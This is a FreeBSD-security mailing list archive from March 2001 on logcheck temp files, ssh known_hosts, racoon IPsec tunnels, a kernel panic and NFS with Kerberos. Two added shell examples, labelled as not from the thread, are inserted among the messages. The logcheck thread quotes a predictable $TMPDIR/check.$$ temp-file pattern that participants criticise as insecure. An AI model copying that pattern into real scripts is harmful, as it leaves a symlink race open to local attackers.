From owner-freebsd-security  Sun Mar 11 15:14:49 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.dyndns.org (adsl-63-207-60-158.dsl.lsan03.pacbell.net [63.207.60.158])
	by hub.freebsd.org (Postfix) with ESMTP id 19A3B37B718
	for <freebsd-security@freebsd.org>; Sun, 11 Mar 2001 15:14:45 -0800 (PST)
	(envelope-from kris@obsecurity.org)
Received: by obsecurity.dyndns.org (Postfix, from userid 1000)
	id C67C366F14; Sun, 11 Mar 2001 15:14:44 -0800 (PST)
Date: Sun, 11 Mar 2001 15:14:44 -0800
From: Kris Kennaway <kris@obsecurity.org>
To: Greg White <gregw-freebsd-security@greg.cex.ca>
Cc: FreeBSD Security <freebsd-security@freebsd.org>
Subject: Re: temp files for security/logcheck
Message-ID: <20010311151444.A69514@mollari.cthul.hu>
References: <200103110435.f2B4ZHw04676@ns1.unixathome.org>; <20010310234519.A68252@databits.net> <200103110447.f2B4lww04741@ns1.unixathome.org> <20010310225345.A14180@mollari.cthul.hu> <20010310230843.A26101@greg.cex.ca>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5;
	protocol="application/pgp-signature"; boundary="C7zPtVaVf+AK4Oqc"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010310230843.A26101@greg.cex.ca>; from gregw-freebsd-security@greg.cex.ca on Sat, Mar 10, 2001 at 11:08:43PM -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org


--C7zPtVaVf+AK4Oqc
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On Sat, Mar 10, 2001 at 11:08:43PM -0800, Greg White wrote:
> On Sat, Mar 10, 2001 at 10:53:46PM -0800, Kris Kennaway wrote:
> > On Sun, Mar 11, 2001 at 05:47:58PM +1300, Dan Langille wrote:
> > > AFAIK, the files disappear each time the script is run:
> > >
> > > umask 077
> > > rm -f $TMPDIR/check.$$ $TMPDIR/checkoutput.$$
> >
> > [...]
> >
> > Blah, that's an insecure way to create files in $TMPDIR (which is
> > usually /tmp).  It needs to use mktemp(1).
> >
> > Kris
>
> It is in general, but not in this case. The script and the directory are
> mode 0700 -- this makes it difficult for it to be insecure. $TMPDIR is
> explicitly set.

Okay.. I was missing context: $TMPDIR is usually inherited from the
user's environment and points to /tmp or whatever their preferred
temporary file directory is.

I don't like the use of /usr/local for temporary file storage -- that
may be on a readonly filesystem.  The script needs to use mktemp -d -t
to create itself a secure directory to play in.

Kris

--C7zPtVaVf+AK4Oqc
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE6rAbkWry0BWjoQKURAmBUAKCWYbz6ncb2+HN7x3IAYoKtO/qQTACgiOuM
9gCN4FYBw/UbhK90b/+ZTkc=
=KwUc
-----END PGP SIGNATURE-----

--C7zPtVaVf+AK4Oqc--

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
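Kris's point above (use mktemp(1) rather than predictable $TMPDIR/check.$$ names), as an added shell example that is not the logcheck port's script and not from the thread: it creates a private 0700 directory with mktemp, checks that directory before trusting it, fails cleanly when the chosen location cannot be written (Kris's read-only filesystem case), and removes it on every exit path. The function names make_workdir, check_private_dir and run_check are this example's own; it passes mktemp an explicit template instead of the `-d -t` spelling so that it behaves the same under BSD and GNU mktemp.

```sh
#!/bin/sh
# Added example, not the logcheck port's own script.
#
# Pattern being replaced (quoted from the thread), shown only as a comment:
#   umask 077
#   rm -f $TMPDIR/check.$$ $TMPDIR/checkoutput.$$
# The PID suffix is guessable, and any other user who can write to $TMPDIR
# could pre-create or symlink that name before the script opens it.

umask 077   # everything this script creates is private to the invoking user

# make_workdir: create a fresh 0700 directory under $TMPDIR (default /tmp)
# and print its path. Returns non-zero if mktemp cannot create it, for
# instance because the chosen base directory is on a read-only filesystem.
# The explicit template works with both BSD and GNU mktemp; the thread's
# "mktemp -d -t logcheck" relies on BSD argument handling.
make_workdir() {
    _base="${TMPDIR:-/tmp}"
    _dir=$(mktemp -d "${_base}/logcheck.XXXXXXXX") || return 1
    printf '%s\n' "$_dir"
}

# check_private_dir DIR: succeed only if DIR is a real directory (not a
# symlink planted at that name), owned by the caller and mode 0700.
# ls/cut/awk are used instead of stat(1) because stat's flags differ
# between BSD and GNU.
check_private_dir() {
    _d="$1"
    [ ! -L "$_d" ] || return 1
    [ -d "$_d" ] || return 1
    _owner=$(ls -ld "$_d" | awk '{print $3}')
    [ "$_owner" = "$(id -un)" ] || return 1
    _mode=$(ls -ld "$_d" | cut -c1-10)
    [ "$_mode" = "drwx------" ] || return 1
}

# run_check: the shape the script should take. All scratch files live in
# the private directory, and the trap removes it whether the script ends
# normally, fails, or is interrupted. Prints the line count it computed.
run_check() {
    _work=$(make_workdir) || { echo "cannot create work directory" >&2; return 1; }
    trap 'rm -rf "$_work"' EXIT INT TERM
    check_private_dir "$_work" || { echo "work directory is not private" >&2; return 1; }
    # constructed input standing in for the log text logcheck would filter
    printf 'sample log line\n' > "$_work/check"
    grep -c 'log' "$_work/check" > "$_work/checkoutput"
    cat "$_work/checkoutput"
}

run_check
```

The ownership and mode checks are cheap insurance against a misconfigured $TMPDIR (a shared directory without the sticky bit, or one that has been made world-readable): mktemp guarantees a unique name, but it cannot fix the permissions of the directory it was pointed at.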


From owner-freebsd-security  Sun Mar 11 16:51:00 2001
Delivered-To: freebsd-security@freebsd.org
Received: from daedalus.cs.brandeis.edu (daedalus.cs.brandeis.edu [129.64.3.179])
	by hub.freebsd.org (Postfix) with ESMTP id AB1C037B718
	for <security@freebsd.org>; Sun, 11 Mar 2001 16:50:58 -0800 (PST)
	(envelope-from meshko@daedalus.cs.brandeis.edu)
Received: from localhost (meshko@localhost)
	by daedalus.cs.brandeis.edu (8.9.3/8.9.3) with ESMTP id TAA00681
	for <security@freebsd.org>; Sun, 11 Mar 2001 19:50:53 -0500
Date: Sun, 11 Mar 2001 19:50:53 -0500 (EST)
From: Mikhail Kruk <meshko@cs.brandeis.edu>
To: <security@freebsd.org>
Subject: ssh knownhosts ip vs domain name
Message-ID: <Pine.LNX.4.30.0103111944510.519-100000@daedalus.cs.brandeis.edu>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I have a machine which has a dynamic IP. I use the dyndns.org dynamic DNS
service, so when the IP on that machine changes, name.dyndns.org points to the
new IP. So when I want to ssh to this box, I do ssh name.dyndns.org.
However ssh doesn't put name.dyndns.org into the known_hosts file, but
rather saves the new IP, which is obviously not what I want.
Is there any way to force it to check by domain name, not by IP?

(I'm using OpenSSH_2.3.0p1)

thanks
mk




From owner-freebsd-security  Sun Mar 11 17:45:26 2001
Delivered-To: freebsd-security@freebsd.org
Received: from shorty.ahpcns.com (joemoore-host.dsl.visi.com [209.98.246.61])
	by hub.freebsd.org (Postfix) with ESMTP id B2CDE37B718
	for <freebsd-security@freebsd.org>; Sun, 11 Mar 2001 17:45:23 -0800 (PST)
	(envelope-from jomor@ahpcns.com)
Received: from ahpcns.com (localhost [127.0.0.1])
	by shorty.ahpcns.com (Postfix) with ESMTP id CB3643A4C7
	for <freebsd-security@freebsd.org>; Sun, 11 Mar 2001 19:45:20 -0600 (CST)
Message-ID: <3AAC2A30.8DA0061D@ahpcns.com>
Date: Sun, 11 Mar 2001 19:45:20 -0600
From: jomor <jomor@ahpcns.com>
Organization: ahpcns
X-Mailer: Mozilla 4.72 [en] (X11; I; FreeBSD 3.5-STABLE i386)
X-Accept-Language: en
MIME-Version: 1.0
To: freebsd-security@freebsd.org
Subject: Re: IPSEC tunnel & setkey, How do I tell if setkey worked?
References: <3AAB2008.E35A125D@ahpcns.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

jomor wrote:

> I'm finally trying to get a VPN set up between home (DSL) and work
> (T-1). I've been running FreeBSD on my home firewall for a few years and
> now I want it to be an IPSEC tunnel  endpoint. The other end will be
> another freeBSD box first, and maybe eventually a Watchguard firebox2
> firewall "appliance".  I'm testing off-line for now. I haven't been able
> to find any info on integrating my ipfw rules with the tunnel so I've
> got test boxes set up in an "open" firewall config. I figure I'll get
> the tunnel up first and then break it while I try different ipfw rules.
>

Never mind... I got it figured out (I think).





From owner-freebsd-security  Sun Mar 11 20:39:24 2001
Delivered-To: freebsd-security@freebsd.org
Received: from smtp.whitebarn.com (Spin.whitebarn.com [216.0.13.113])
	by hub.freebsd.org (Postfix) with ESMTP
	id E510F37B718; Sun, 11 Mar 2001 20:39:18 -0800 (PST)
	(envelope-from Bob@Talarian.Com)
Received: from Talarian.Com (Relent.Bob.whitebarn.com [216.0.13.50])
	by smtp.whitebarn.com (8.9.3/8.9.3) with ESMTP id WAA16567;
	Sun, 11 Mar 2001 22:39:17 -0600 (CST)
	(envelope-from Bob@Talarian.Com)
Message-ID: <3AAC52F4.1000602@Talarian.Com>
Date: Sun, 11 Mar 2001 22:39:16 -0600
From: Bob Van Valzah <Bob@Talarian.Com>
User-Agent: Mozilla/5.0 (X11; U; Linux 2.2.12 i386; en-US; 0.8) Gecko/20010215
X-Accept-Language: en
MIME-Version: 1.0
To: FreeBSD-Security@FreeBSD.Org
Cc: FreeBSD-Questions@FreeBSD.Org
Subject: Racoon Problem & Cisco Tunnel
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I have several remote FreeBSD users who want to connect their home LANs 
to my trusted network over an IPSec tunnel via a DSL connection. I'd 
like my end of the tunnel to terminate on a Cisco if possible. (Though I 
do have many FreeBSD boxes handy, I just feel better when layer-2 
infrastructure doesn't depend on boxes with hard drives.) Any general 
advice on how to do this would be appreciated.

As near as I can tell, I have to run racoon and configure it for 
pre-shared keys to talk to the cisco. But I don't think the racoon is 
even starting right. I get this message: "ERROR: 
pfkey.c:207:pfkey_handler(): pfkey X_SPDDUMP failed No such file or 
directory." Happens with the config files I've written and the stock 
ones. I'm running a freshly sup'd box with racoon-20010222a built from 
ports.

All help and advice appreciated.

   Thanks,

   Bob




From owner-freebsd-security  Sun Mar 11 20:50:16 2001
Delivered-To: freebsd-security@freebsd.org
Received: from smtprelay1.adelphia.net (smtprelay1.adelphia.net [64.8.25.6])
	by hub.freebsd.org (Postfix) with ESMTP
	id A58A837B719; Sun, 11 Mar 2001 20:50:09 -0800 (PST)
	(envelope-from packetwhore@stargate.net)
Received: from pa-westmifflin1a-385.pit.adelphia.net
          ([24.48.239.129]) by smtprelay1.adelphia.net (Netscape Messaging
          Server 4.15) with ESMTP id GA2IQX00.U4C; Sun, 11 Mar 2001 23:49:45 -0500 
Date: Sun, 11 Mar 2001 23:42:59 -0500 (EST)
From: pW <packetwhore@stargate.net>
X-X-Sender: <packetwhore@beastie>
To: Bob Van Valzah <Bob@Talarian.Com>
Cc: <FreeBSD-Security@FreeBSD.Org>, <FreeBSD-Questions@FreeBSD.Org>
Subject: Re: Racoon Problem & Cisco Tunnel
In-Reply-To: <3AAC52F4.1000602@Talarian.Com>
Message-ID: <Pine.BSF.4.32.0103112341130.11277-100000@beastie>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Out of curiosity...
do your DSL users have public static IPs? I work at an ISP and almost all
of our DSL customers have static private IPs and use NAT for public
ones... just wondering because you may have to enable some sort of NAT
transparency otherwise it may break the VPN...

just a thought...

shawn

On Sun, 11 Mar 2001, Bob Van Valzah wrote:

> I have several remote FreeBSD users who want to connect their home LANs
> to my trusted network over an IPSec tunnel via a DSL connection. I'd
> like my end of the tunnel to terminate on a Cisco if possible. (Though I
> do have many FreeBSD boxes handy, I just feel better when layer-2
> infrastructure doesn't depend on boxes with hard drives.) Any general
> advice on how to do this would be appreciated.
>
> As near as I can tell, I have to run racoon and configure it for
> pre-shared keys to talk to the cisco. But I don't think the racoon is
> even starting right. I get this message: "ERROR:
> pfkey.c:207:pfkey_handler(): pfkey X_SPDDUMP failed No such file or
> directory." Happens with the config files I've written and the stock
> ones. I'm running a freshly sup'd box with racoon-20010222a built from
> ports.
>
> All help and advice appreciated.
>
>    Thanks,
>
>    Bob
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>




From owner-freebsd-security  Mon Mar 12 01:38:27 2001
Delivered-To: freebsd-security@freebsd.org
Received: from gyw.com (gyw.com [209.55.67.177])
	by hub.freebsd.org (Postfix) with ESMTP id 2B58137B718
	for <security@FreeBSD.ORG>; Mon, 12 Mar 2001 01:38:25 -0800 (PST)
	(envelope-from tjk@tksoft.com)
Received: from smtp3.tksoft.com (smtp3.tksoft.com [192.168.50.56] (may be forged))
	by gyw.com (8.8.8/8.8.8) with ESMTP id BAA11155;
	Mon, 12 Mar 2001 01:54:07 -0800
Received: (from tjk@tksoft.com)
	by smtp3.tksoft.com (8.8.8/8.8.8) id BAA18994;
	Mon, 12 Mar 2001 01:34:20 -0800
From: "tjk@tksoft.com" <tjk@tksoft.com>
Message-Id: <200103120934.BAA18994@smtp3.tksoft.com>
Subject: Re: ssh knownhosts ip vs domain name
To: meshko@cs.brandeis.edu (Mikhail Kruk)
Date: Mon, 12 Mar 2001 01:34:20 -0800 (PST)
Cc: security@FreeBSD.ORG
In-Reply-To: <Pine.LNX.4.30.0103111944510.519-100000@daedalus.cs.brandeis.edu> from "Mikhail Kruk" at Mar 11, 2001 07:50:53 PM
X-Info: None
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Edit the known_hosts file by hand.

Troy

> 
> I have a machine which has a dynamic IP. I use the dyndns.org dynamic DNS
> service, so when the IP on that machine changes, name.dyndns.org points to the
> new IP. So when I want to ssh to this box, I do ssh name.dyndns.org.
> However ssh doesn't put name.dyndns.org into the known_hosts file, but
> rather saves the new IP, which is obviously not what I want.
> Is there any way to force it to check by domain name, not by IP?
> 
> (I'm using OpenSSH_2.3.0p1)
> 
> thanks
> mk
> 
> 
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
> 


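Troy's suggestion (edit the known_hosts file by hand), as an added shell example that is not part of the thread and not OpenSSH's own tooling: it rekeys an entry that ssh stored under an IP address so that it is matched by hostname, using the known_hosts line layout (comma-separated host list, key type, key, optional comment). The function names, the RFC 5737 documentation addresses and the placeholder key strings are constructed for this example; hashed (`|1|`) and `@marker` lines are passed through unchanged because plain string comparison cannot match them. The rewrite is worth doing only after confirming out of band that the key recorded under the IP really is the dynamic-DNS host's key, since a rekeyed wrong entry would make ssh trust the wrong machine under that name.

```sh
#!/bin/sh
# Added example, not from the thread and not an OpenSSH utility.
#
# known_hosts line layout (OpenSSH):
#   host1,host2,...   keytype   base64-key   [comment]
# The first field lists every name or address the key is trusted for.

# known_hosts_matches FILE HOST: print the key lines whose host list
# contains HOST exactly (what ssh consults when it connects to HOST).
# Comment, blank, @marker and hashed |1| lines are skipped.
known_hosts_matches() {
    awk -v want="$2" '
        NF == 0 || substr($1, 1, 1) == "#" || $1 ~ /^@/ || substr($1, 1, 3) == "|1|" { next }
        {
            n = split($1, hosts, ",")
            for (i = 1; i <= n; i++)
                if (hosts[i] == want) { print; break }
        }
    ' "$1"
}

# known_hosts_rekey FILE IP HOSTNAME: print FILE with IP replaced by
# HOSTNAME in every host list that contains it, collapsing duplicates so a
# list never names the same host twice. Other lines are printed verbatim.
known_hosts_rekey() {
    awk -v ip="$2" -v name="$3" '
        NF == 0 || substr($1, 1, 1) == "#" || $1 ~ /^@/ || substr($1, 1, 3) == "|1|" { print; next }
        {
            n = split($1, hosts, ",")
            out = ""
            split("", seen)             # portable way to empty an awk array
            for (i = 1; i <= n; i++) {
                h = (hosts[i] == ip) ? name : hosts[i]
                if (h in seen) continue
                seen[h] = 1
                out = (out == "") ? h : out "," h
            }
            $1 = out
            print
        }
    ' "$1"
}

# Constructed sample file: documentation addresses and placeholder keys,
# written to a private temporary file that is removed on exit.
KNOWN_HOSTS_SAMPLE=$(mktemp "${TMPDIR:-/tmp}/known_hosts.XXXXXXXX") || exit 1
trap 'rm -f "$KNOWN_HOSTS_SAMPLE" "$KNOWN_HOSTS_SAMPLE.new"' EXIT
cat > "$KNOWN_HOSTS_SAMPLE" <<'EOF'
# constructed sample: the keys below are placeholders, not real host keys
192.0.2.10 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQDplaceholderkey1
other.example.org,198.51.100.7 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQDplaceholderkey2
EOF

# Rekey the entry ssh stored under the address so it matches the name.
known_hosts_rekey "$KNOWN_HOSTS_SAMPLE" 192.0.2.10 name.dyndns.org > "$KNOWN_HOSTS_SAMPLE.new"
echo "entries now trusted for name.dyndns.org:"
known_hosts_matches "$KNOWN_HOSTS_SAMPLE.new" name.dyndns.org
```

Writing the result to a new file and inspecting it before moving it over ~/.ssh/known_hosts keeps a bad edit from locking you out; the untouched second line shows that entries for other hosts, including ones that list several names, survive the rewrite as they were.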


From owner-freebsd-security  Mon Mar 12 02:04:44 2001
Delivered-To: freebsd-security@freebsd.org
Received: from smtp12.singnet.com.sg (smtp12.singnet.com.sg [165.21.6.32])
	by hub.freebsd.org (Postfix) with ESMTP id C878437B718
	for <freebsd-security@freebsd.org>; Mon, 12 Mar 2001 02:04:39 -0800 (PST)
	(envelope-from spades@galaxynet.org)
Received: from bryan (ad202.166.105.169.magix.com.sg [202.166.105.169])
	by smtp12.singnet.com.sg (8.11.2/8.11.2) with SMTP id f2CA4dC02444
	for <freebsd-security@freebsd.org>; Mon, 12 Mar 2001 18:04:39 +0800 (SGT)
Message-Id: <3.0.32.20010312181407.01724af8@smtp.magix.com.sg>
X-Sender: spades@smtp.magix.com.sg
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Mon, 12 Mar 2001 18:14:08 +0800
To: freebsd-security@freebsd.org
From: Spades <spades@galaxynet.org>
Subject: rebooting error
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

What kinda error gives this?

> Fatal trap 12: page fault while in kernel mode
> fault virtual address	= 0xbffa6a40
> fault code		= supervisor write, page not present
> instruction pointer	= 0x8:0xc03093a1
> stack pointer	        = 0x10:0xd6398c7c
> frame pointer	        = 0x10:0xd6398c7c
> code segment		= base 0x0, limit 0xfffff, type 0x1b
> 			= DPL 0, pres 1, def32 1, gran 1
> processor eflags	= interrupt enabled, resume, IOPL = 0
> current process		= 45257 (gcc)
> interrupt mask		= bio 
> trap number		= 12
> panic: page fault
> 
> syncing disks... 132 132 132 132 132 132 132 132 132 132 132 132 132 132
> 132 132 132 132



From owner-freebsd-security  Mon Mar 12 02:56:16 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13])
	by hub.freebsd.org (Postfix) with SMTP id 259D037B718
	for <freebsd-security@freebsd.org>; Mon, 12 Mar 2001 02:56:14 -0800 (PST)
	(envelope-from roam@orbitel.bg)
Received: (qmail 5829 invoked by uid 1000); 12 Mar 2001 10:55:37 -0000
Date: Mon, 12 Mar 2001 12:55:37 +0200
From: Peter Pentchev <roam@orbitel.bg>
To: Spades <spades@galaxynet.org>
Cc: freebsd-security@freebsd.org
Subject: Re: rebooting error
Message-ID: <20010312125537.A469@ringworld.oblivion.bg>
Mail-Followup-To: Spades <spades@galaxynet.org>,
	freebsd-security@freebsd.org
References: <3.0.32.20010312181407.01724af8@smtp.magix.com.sg>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <3.0.32.20010312181407.01724af8@smtp.magix.com.sg>; from spades@galaxynet.org on Mon, Mar 12, 2001 at 06:14:08PM +0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, Mar 12, 2001 at 06:14:08PM +0800, Spades wrote:
> What kinda error gives this?

Only you can tell us that; look at
http://www.FreeBSD.org/handbook/kerneldebug.html for a start :)

G'luck,
Peter

-- 
This sentence contains exactly threee erors.



From owner-freebsd-security  Mon Mar 12 08:08:07 2001
Delivered-To: freebsd-security@freebsd.org
Received: from smtp.whitebarn.com (Spin.whitebarn.com [216.0.13.113])
	by hub.freebsd.org (Postfix) with ESMTP
	id 6256937B719; Mon, 12 Mar 2001 08:08:01 -0800 (PST)
	(envelope-from Bob@Talarian.Com)
Received: from Talarian.Com (NewStorm.whitebarn.com [216.0.13.77])
	by smtp.whitebarn.com (8.9.3/8.9.3) with ESMTP id KAA22877;
	Mon, 12 Mar 2001 10:07:58 -0600 (CST)
	(envelope-from Bob@Talarian.Com)
Message-ID: <3AACF40D.4080504@Talarian.Com>
Date: Mon, 12 Mar 2001 10:06:37 -0600
From: Bob Van Valzah <Bob@Talarian.Com>
User-Agent: Mozilla/5.0 (X11; U; Linux 2.2.12 i386; en-US; 0.8) Gecko/20010215
X-Accept-Language: en
MIME-Version: 1.0
To: pW <packetwhore@stargate.net>
Cc: FreeBSD-Security@FreeBSD.Org, FreeBSD-Questions@FreeBSD.Org
Subject: Re: Racoon Problem & Cisco Tunnel
References: <Pine.BSF.4.32.0103112341130.11277-100000@beastie>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Yes. The five DSL setups with which I'm familiar all grant at least one 
public address per house. I believe all are static, but one might be 
dynamic. Interference with protocols like IPSec is one of the reasons 
why I'd make a public address a requirement when choosing a DSL 
provider. When it comes to NAT, I'm with Vint Cerf--avoid it if at all 
possible. Let's hasten the deployment of IPv6.

   Bob

pW wrote:

> Out of curiosity...
> do your DSL users have public static IPs? I work at an ISP and almost all
> of our DSL customers have static private IPs and use NAT for public
> ones... just wondering because you may have to enable some sort of NAT
> transparency otherwise it may break the VPN...
> 
> just a thought...
> 
> shawn
> 
> On Sun, 11 Mar 2001, Bob Van Valzah wrote:
> 
>> I have several remote FreeBSD users who want to connect their home LANs
>> to my trusted network over an IPSec tunnel via a DSL connection. I'd
>> like my end of the tunnel to terminate on a Cisco if possible. (Though I
>> do have many FreeBSD boxes handy, I just feel better when layer-2
>> infrastructure doesn't depend on boxes with hard drives.) Any general
>> advice on how to do this would be appreciated.
>> 
>> As near as I can tell, I have to run racoon and configure it for
>> pre-shared keys to talk to the cisco. But I don't think the racoon is
>> even starting right. I get this message: "ERROR:
>> pfkey.c:207:pfkey_handler(): pfkey X_SPDDUMP failed No such file or
>> directory." Happens with the config files I've written and the stock
>> ones. I'm running a freshly sup'd box with racoon-20010222a built from
>> ports.
>> 
>> All help and advice appreciated.
>> 
>>    Thanks,
>> 
>>    Bob
>> 
>> 
>> To Unsubscribe: send mail to majordomo@FreeBSD.org
>> with "unsubscribe freebsd-security" in the body of the message
>> 




From owner-freebsd-security  Mon Mar 12 10:13:10 2001
Delivered-To: freebsd-security@freebsd.org
Received: from meow.osd.bsdi.com (meow.osd.bsdi.com [204.216.28.88])
	by hub.freebsd.org (Postfix) with ESMTP id 1B0D737B719
	for <freebsd-security@FreeBSD.org>; Mon, 12 Mar 2001 10:13:06 -0800 (PST)
	(envelope-from jhb@FreeBSD.org)
Received: from laptop.baldwin.cx (john@jhb-laptop.osd.bsdi.com [204.216.28.241])
	by meow.osd.bsdi.com (8.11.2/8.11.2) with ESMTP id f2CICwA80390;
	Mon, 12 Mar 2001 10:12:58 -0800 (PST)
	(envelope-from jhb@FreeBSD.org)
Message-ID: <XFMail.010312101238.jhb@FreeBSD.org>
X-Mailer: XFMail 1.4.0 on FreeBSD
X-Priority: 3 (Normal)
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
In-Reply-To: <3.0.32.20010312181407.01724af8@smtp.magix.com.sg>
Date: Mon, 12 Mar 2001 10:12:38 -0800 (PST)
From: John Baldwin <jhb@FreeBSD.org>
To: Spades <spades@galaxynet.org>
Subject: RE: rebooting error
Cc: freebsd-security@FreeBSD.org
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org


On 12-Mar-01 Spades wrote:
> What kinda error gives this?

Either a bug in the kernel, or possibly bad hardware (could be bad memory,
disk, CPU, etc.).  Can you reproduce it, and is it always the same set of
messages?
 
>> Fatal trap 12: page fault while in kernel mode
>> fault virtual address        = 0xbffa6a40
>> fault code           = supervisor write, page not present
>> instruction pointer  = 0x8:0xc03093a1
>> stack pointer                = 0x10:0xd6398c7c
>> frame pointer                = 0x10:0xd6398c7c
>> code segment         = base 0x0, limit 0xfffff, type 0x1b
>>                      = DPL 0, pres 1, def32 1, gran 1
>> processor eflags     = interrupt enabled, resume, IOPL = 0
>> current process              = 45257 (gcc)
>> interrupt mask               = bio 
>> trap number          = 12
>> panic: page fault
>> 
>> syncing disks... 132 132 132 132 132 132 132 132 132 132 132 132 132 132
>> 132 132 132 132
> 
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message

-- 

John Baldwin <jhb@FreeBSD.org> -- http://www.FreeBSD.org/~jhb/
PGP Key: http://www.baldwin.cx/~john/pgpkey.asc
"Power Users Use the Power to Serve!"  -  http://www.FreeBSD.org/



From owner-freebsd-security  Mon Mar 12 10:19:36 2001
Delivered-To: freebsd-security@freebsd.org
Received: from polaris.we.lc.ehu.es (polaris.we.lc.ehu.es [158.227.6.43])
	by hub.freebsd.org (Postfix) with ESMTP id 050D237B718
	for <security@FreeBSD.org>; Mon, 12 Mar 2001 10:19:32 -0800 (PST)
	(envelope-from jose@we.lc.ehu.es)
Received: from v-ger.we.lc.ehu.es (v-ger [158.227.6.179])
	by polaris.we.lc.ehu.es (8.11.1/8.11.1) with ESMTP id f2CIJT906785
	for <security@FreeBSD.org>; Mon, 12 Mar 2001 19:19:29 +0100 (MET)
Received: from we.lc.ehu.es (localhost [127.0.0.1])
	by v-ger.we.lc.ehu.es (8.11.1/8.11.1) with ESMTP id f2CHvr700734
	for <security@FreeBSD.org>; Mon, 12 Mar 2001 18:57:53 +0100 (CET)
	(envelope-from jose@we.lc.ehu.es)
Message-ID: <3AAD0E21.4EDB1E4C@we.lc.ehu.es>
Date: Mon, 12 Mar 2001 18:57:53 +0100
From: "Jose M. Alcaide" <jose@we.lc.ehu.es>
Organization: Universidad del Pais Vasco - Dpto. de Electricidad y Electronica
X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.2.12 i386)
X-Accept-Language: es-ES, es, en-US, en
MIME-Version: 1.0
To: security@FreeBSD.org
Subject: NFS and kerberos?
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hello,

I want to authenticate NFS clients on an NFS server (all of them running
FreeBSD 4.3). I found that SecureRPC is not an option, but I also found
the "-kerb" flag in exports(5). However, the manpage says:

     The -kerb option specifies that the Kerberos authentication server should
     be used to authenticate and map client credentials.  This option requires
     that the kernel be built with the NFSKERB option.  The use of this option
     will prevent the kernel from compiling unless calls to the appropriate
     Kerberos encryption routines are provided in the NFS source.

I searched sys/nfs/* for NFSKERB and indeed I found some "XXX" placeholders
parenthesized by "#ifdef NFSKERB" for (I think) those calls to the Kerberos
encryption routines. Obviously the kernel cannot be compiled if NFSKERB
is #define'd.

My question is: can I use kerberos for NFS client authentication? If
I cannot, then I'll welcome any suggestions about how to share file
systems with authenticated clients.

TIA,
-- JMA
****** Jose M. Alcaide  //  jose@we.lc.ehu.es  //  jmas@FreeBSD.org ******
** "Beware of Programmers who carry screwdrivers" --  Leonard Brandwein **



From owner-freebsd-security  Mon Mar 12 13:59:35 2001
Delivered-To: freebsd-security@freebsd.org
Received: from castle.dreaming.org (castle.dreaming.org [216.221.214.170])
	by hub.freebsd.org (Postfix) with ESMTP id 4613037B719
	for <freebsd-security@freebsd.org>; Mon, 12 Mar 2001 13:59:31 -0800 (PST)
	(envelope-from mit@mitayai.net)
Received: from cr592943a (cr592943-a.bloor1.on.wave.home.com [24.156.38.199])
	by castle.dreaming.org (8.11.2/8.11.2) with SMTP id f2CLxUe14305
	for <freebsd-security@freebsd.org>; Mon, 12 Mar 2001 16:59:30 -0500 (EST)
	(envelope-from mit@mitayai.net)
From: "Will Mitayai Keeso Rowe" <mit@mitayai.net>
To: <freebsd-security@freebsd.org>
Subject: Virus Scanning Software for FreeBSD
Date: Mon, 12 Mar 2001 16:56:43 -0500
Message-ID: <NEBBIEGPMLMKDBMMICFNCEPPELAA.mit@mitayai.net>
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----=_NextPart_000_0019_01C0AB15.6AA82040"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
Importance: Normal
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
